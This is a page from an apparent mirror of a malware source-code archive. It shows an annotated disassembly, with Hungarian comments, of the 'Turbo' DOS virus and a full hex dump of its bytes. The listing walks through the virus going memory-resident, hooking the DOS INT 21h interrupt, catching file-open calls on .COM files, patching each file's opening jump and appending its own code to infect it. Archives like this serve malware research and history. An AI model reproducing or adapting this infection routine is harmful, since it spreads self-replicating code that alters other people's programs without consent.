Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
2be37d2649
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.turbo.asm
vxunderground 3e7d2e8262
Add files via upload
2021-01-12 18:01:59 -06:00

324 lines
11 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

@ virus unassembled list:
`90.07.21.
Magyar zat: Kv ri L szl˘
Tel.: (41) 21-822 07-13:20 mh.
21-033 18:00-
0EB0:0100 E80000 CALL 0103
0EB0:0103 90 NOP
0EB0:0104 5E POP SI ;SI=IP b ziscˇm
0EB0:0105 50 PUSH AX
0EB0:0106 51 PUSH CX
0EB0:0107 B82135 MOV AX,3521
0EB0:010A CD21 INT 21 ;INT 21h cˇm lekrdezse
0EB0:010C 8CC0 MOV AX,ES
0EB0:010E 3D0040 CMP AX,4000 ;mem˘ri ban vam ?
0EB0:0111 7220 JB 0133 ;nincs nem 4000h f”l
;mutat!
0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza
0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime
0EB0:0119 03F2 ADD SI,DX ;b zishoz
0EB0:011B 8B1C MOV BX,[SI]
0EB0:011D 8B4C02 MOV CX,[SI+02]
0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op.
0EB0:0124 890E0201 MOV [0102],CX ;visszarak sa
0EB0:0128 8CD8 MOV AX,DS
0EB0:012A 8EC0 MOV ES,AX ;ES=DS
0EB0:012C 59 POP CX
0EB0:012D 58 POP AX
0EB0:012E BB0001 MOV BX,0100
0EB0:0131 FFE3 JMP BX ;ugr s 0100h-ra igy
;lefut az eredeti prg.
;Ha nincs a mem˘ri ban
0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetejnek
;paragrafuscˇme
0EB0:0136 2D0008 SUB AX,0800
0EB0:0139 8EC0 MOV ES,AX ;virus Łj szegmens
0EB0:013B BF0001 MOV DI,0100
0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza
0EB0:0141 B90002 MOV CX,0200 ;virus mrete
0EB0:0144 F3 REPZ
0EB0:0145 A4 MOVSB ;virus m sol sa az
;Łj szegmensbe
0EB0:0146 8C06F200 MOV [00F2],ES ;Łj szegmenscˇm
0EB0:014A B95501 MOV CX,0155 ;Łj szegmensben a be-
;lpsi offset-je
0EB0:014D 890EF000 MOV [00F0],CX
0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugr s az Łj seg.:0155
;belpsi pont
0EB0:0155 8CC1 MOV CX,ES
0EB0:0157 8CD8 MOV AX,DS
0EB0:0159 26 ES:
0EB0:015A A38C02 MOV [028C],AX ;rgi seg (eredeti
;program)
0EB0:015D B80001 MOV AX,0100
0EB0:0160 26 ES:
0EB0:0161 A38A02 MOV [028A],AX ;0100h offset
0EB0:0164 8CC0 MOV AX,ES
0EB0:0166 8ED8 MOV DS,AX ;DS=Łj seg
0EB0:0168 B82135 MOV AX,3521
0EB0:016B CD21 INT 21 ;INT 21h lekrdezse
0EB0:016D 2E CS:
0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset
0EB0:0172 8CC3 MOV BX,ES
0EB0:0174 2E CS:
0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment
0EB0:0179 B8A501 MOV AX,01A5 ;Łj INT 21h offset
0EB0:017C 8BD0 MOV DX,AX
0EB0:017E 8BC1 MOV AX,CX
0EB0:0180 8ED8 MOV DS,AX
0EB0:0182 B82125 MOV AX,2521
0EB0:0185 CD21 INT 21 ;INT 21h ellop sa
0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op.
0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus
0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg.
0EB0:0192 8ED8 MOV DS,AX
0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op.
0EB0:0198 890E0201 MOV [0102],CX ;visszarak sa
0EB0:019C 8EC0 MOV ES,AX
0EB0:019E 59 POP CX
0EB0:019F 58 POP AX
0EB0:01A0 2E CS:
0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugr s az eredeti
;programra
;Łj INT 21h rutin
0EB0:01A5 90 NOP
0EB0:01A6 80FC3D CMP AH,3D ;file nyit s ?
0EB0:01A9 7403 JZ 01AE ;igen
0EB0:01AB E9C000 JMP 026E ;ugr s az eredeti
;INT 21h-ra
0EB0:01AE 1E PUSH DS
0EB0:01AF 06 PUSH ES
0EB0:01B0 50 PUSH AX
0EB0:01B1 53 PUSH BX
0EB0:01B2 51 PUSH CX
0EB0:01B3 52 PUSH DX
0EB0:01B4 57 PUSH DI
0EB0:01B5 56 PUSH SI
;Ellen”rzi hogy COM file-e
0EB0:01B6 8BFA MOV DI,DX ;Filespec.
0EB0:01B8 8CDE MOV SI,DS
0EB0:01BA 8EC6 MOV ES,SI
0EB0:01BC B000 MOV AL,00
0EB0:01BE B93200 MOV CX,0032
0EB0:01C1 FC CLD
0EB0:01C2 F2 REPNZ
0EB0:01C3 AE SCASB ;PATH lem sol sa
0EB0:01C4 83EF03 SUB DI,+03
0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba
0EB0:01CA 26 ES:
0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ?
0EB0:01CD 7403 JZ 01D2 ;igen
0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra
0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be
0EB0:01D5 26 ES:
0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ?
0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file!
0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra
0EB0:01DE B43D MOV AH,3D ;file nyit sa
0EB0:01E0 B002 MOV AL,02 ;ˇr s/olvas s
0EB0:01E2 E89000 CALL 0275 ;INT 21h hiv sa
0EB0:01E5 7303 JNB 01EA ;ha nincs hiba
0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra
;File mret ellen”rzs
0EB0:01E9 90 NOP
0EB0:01EA 8BD8 MOV BX,AX ;kezel”
0EB0:01EC B90000 MOV CX,0000
0EB0:01EF BA0000 MOV DX,0000
0EB0:01F2 B80242 MOV AX,4202 ;file vgre poz.
0EB0:01F5 E87D00 CALL 0275 ;INT 21h hiv sa
0EB0:01F8 3D00FE CMP AX,FE00
0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra
;Eredeti 4 byte beolvas sa (JMP+operandusa)
0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza
0EB0:0200 2E CS:
0EB0:0201 A38102 MOV [0281],AX
0EB0:0204 B80042 MOV AX,4200 ;file elejre poz.
0EB0:0207 B90000 MOV CX,0000
0EB0:020A BA0000 MOV DX,0000
0EB0:020D E86500 CALL 0275 ;INT 21h hiv sa
0EB0:0210 B43F MOV AH,3F ;olvas s
0EB0:0212 B90400 MOV CX,0004 ;4 byte
0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa
0EB0:0218 8CCF MOV DI,CS
0EB0:021A 8EDF MOV DS,DI ;DS=CS
0EB0:021C E85600 CALL 0275 ;INT 21h hiv sa
0EB0:021F B005 MOV AL,05
0EB0:0221 3A068902 CMP AL,[0289]
0EB0:0225 743F JZ 0266
;Virusra mutat˘ JMP+op beˇr sa a programba
0EB0:0227 B80042 MOV AX,4200 ;file elejre poz.
0EB0:022A B90000 MOV CX,0000
0EB0:022D 8BD1 MOV DX,CX
0EB0:022F E84300 CALL 0275 ;INT 21h hiv sa
0EB0:0232 B0E9 MOV AL,E9 ;JMP k˘dja
0EB0:0234 2E CS:
0EB0:0235 A28002 MOV [0280],AL ;leteszi
0EB0:0238 B005 MOV AL,05
0EB0:023A 2E CS:
0EB0:023B A28302 MOV [0283],AL
0EB0:023E B90400 MOV CX,0004 ;4 byte
0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete
0EB0:0244 0E PUSH CS
0EB0:0245 1F POP DS
0EB0:0246 B440 MOV AH,40 ;kiˇr s
0EB0:0248 E82A00 CALL 0275 ;INT 21h hiv sa
;1C0h byte kiˇr sa FERT™Z<E284A2>S!
0EB0:024B B80242 MOV AX,4202 ;file vgre poz.
0EB0:024E B90000 MOV CX,0000
0EB0:0251 8BD1 MOV DX,CX
0EB0:0253 E81F00 CALL 0275 ;INT 21h hiv sa
0EB0:0256 BA0001 MOV DX,0100 ;0100h -t˘l
0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte
0EB0:025C B440 MOV AH,40 ;kiˇr sa
0EB0:025E E81400 CALL 0275 ;INT 21h hiv sa
;Ffert”z”tt file z r sa
0EB0:0261 B43E MOV AH,3E
0EB0:0263 E80F00 CALL 0275 ;INT 21h hiv sa
0EB0:0266 5E POP SI
0EB0:0267 5F POP DI
0EB0:0268 5A POP DX
0EB0:0269 59 POP CX
0EB0:026A 5B POP BX
0EB0:026B 58 POP AX
0EB0:026C 07 POP ES
0EB0:026D 1F POP DS
0EB0:026E 90 NOP
0EB0:026F 2E CS:
0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugr s az eredeti
;INT 21h-ra
0EB0:0274 CF IRET
;Eredeti INT 21h hiv sa
0EB0:0275 9C PUSHF ;IRET miatt!
0EB0:0276 2E CS:
0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hiv sa
0EB0:027B C3 RET
0EB0:027C 16 PUSH SS
0EB0:027D 130C ADC CX,[SI]
0EB0:027F 02E9 ADD CH,CL
0EB0:0281 1C00 SBB AL,00
0EB0:0283 050101 ADD AX,0101
0EB0:0286 EB12 JMP 029A
0EB0:0288 90 NOP
0EB0:0289 49 DEC CX
0EB0:028A 0001 ADD [BX+DI],AL
0EB0:028C DD0A ESC 29,[BP+SI][BP+SI]
0EB0:028E 0A0D OR CL,[DI]
0EB0:0290 9A6476206D CALL 6D20:7664
0EB0:0295 69 DB 69
0EB0:0296 6E DB 6E
0EB0:0297 64 DB 64
0EB0:0298 65 DB 65
0EB0:0299 6E DB 6E
0EB0:029A 206E61 AND [BP+61],CH
0EB0:029D 67 DB 67
0EB0:029E 7974 JNS 0314
0EB0:02A0 7564 JNZ 0306
0EB0:02A2 A073A3 MOV AL,[A373]
0EB0:02A5 6E DB 6E
0EB0:02A6 61 DB 61
0EB0:02A7 6B DB 6B
0EB0:02A8 2120 AND [BX+SI],SP
0EB0:02AA 54 PUSH SP
0EB0:02AB 7572 JNZ 031F
0EB0:02AD 62 DB 62
0EB0:02AE 6F DB 6F
0EB0:02AF 204020 AND [BX+SI+20],AL
0EB0:02B2 2E CS:
0EB0:02B3 2E CS:
0EB0:02B4 2E CS:
0EB0:02B5 202E2E2E AND [2E2E],CH
0EB0:02B9 201A AND [BP+SI],BL
0EB0:02BB 0000 ADD [BX+SI],AL
0EB0:02BD 0000 ADD [BX+SI],AL
0EB0:02BF 005374 ADD [BP+DI+74],DL
0EB0:02C2 20E8 AND AL,CH
0EB0:02C4 4E DEC SI
0EB0:02C5 01E9 ADD CX,BP
0EB0:02C7 51 PUSH CX
0EB0:02C8 FF2EC606 JMP FAR [06C6]
0EB0:02CC 050006 ADD AX,0600
0EB0:02CF 2E CS:
0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010
0EB0:02D6 EB7B JMP 0353
0EB0:02D8 90 NOP
0EB0:02D9 2E CS:
0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A
0EB0:02E0 EB71 JMP 0353
0EB0:02E2 90 NOP
0EB0:02E3 2E CS:
0EB0:02E4 FE060600 INC BYTE PTR [0006]
0EB0:02E8 56 PUSH SI
0EB0:02E9 8BF3 MOV SI,BX
0EB0:02EB 83C302 ADD BX,+02
0EB0:02EE 3E DS:
0EB0:02EF 8B7202 MOV SI,[BP+SI+02]
0EB0:02F2 2E CS:
0EB0:02F3 803E060000 CMP BYTE PTR [0006],00
0EB0:02F8 750A JNZ 0304
0EB0:02FA AC LODSB
0EB0:02FB 3C00 CMP AL,00
0EB0:02FD 743B JZ 033A
0EB0:02FF E80F03 CALL 0611
Megjegyzs:
Nincs k ros hat sa. Megold sa kit<EFBFBD>n, hiszen mg egy system
info lekrse esetn sem kkisebb a DOS  lltal l tott mem˘-
ria mret, mint a fizikai RAM mret!
DUMP
0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=.
0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L.
0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX..
0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-.........
0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U....
0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&......
0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!...
0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........
0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!.........
0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX
0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t......
0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2
0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t..
0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....=
0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}.......
0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-..
0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e.
0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V..
0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B......
0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C...............
0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B..
0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@..
0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X....
0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|......
0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I......
0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt
0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo
0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ......
0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........
0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........
0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>.
0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;.
0EB0:0300 0F .

View Git Blame Copy Permalink